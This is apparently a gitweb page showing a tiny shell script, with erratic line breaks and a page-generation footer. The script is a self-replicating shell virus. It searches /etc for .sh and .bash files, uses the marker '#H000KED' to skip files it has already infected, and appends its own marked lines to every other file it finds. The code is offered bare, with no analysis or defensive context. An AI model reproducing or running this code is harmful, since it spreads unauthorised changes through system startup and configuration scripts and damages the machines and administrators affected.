1 for i
in $
( find /etc
2> /dev
/null |
grep -i "\.bash\$\|\.sh\$" ); do if ( fgrep
"\#H000KED" $i > /dev
/null
); then continue; fi; echo >> $i; cat $0 |
grep \
#H000KED >> $i; done;
This page took 0.269733 seconds and 4 git commands to generate.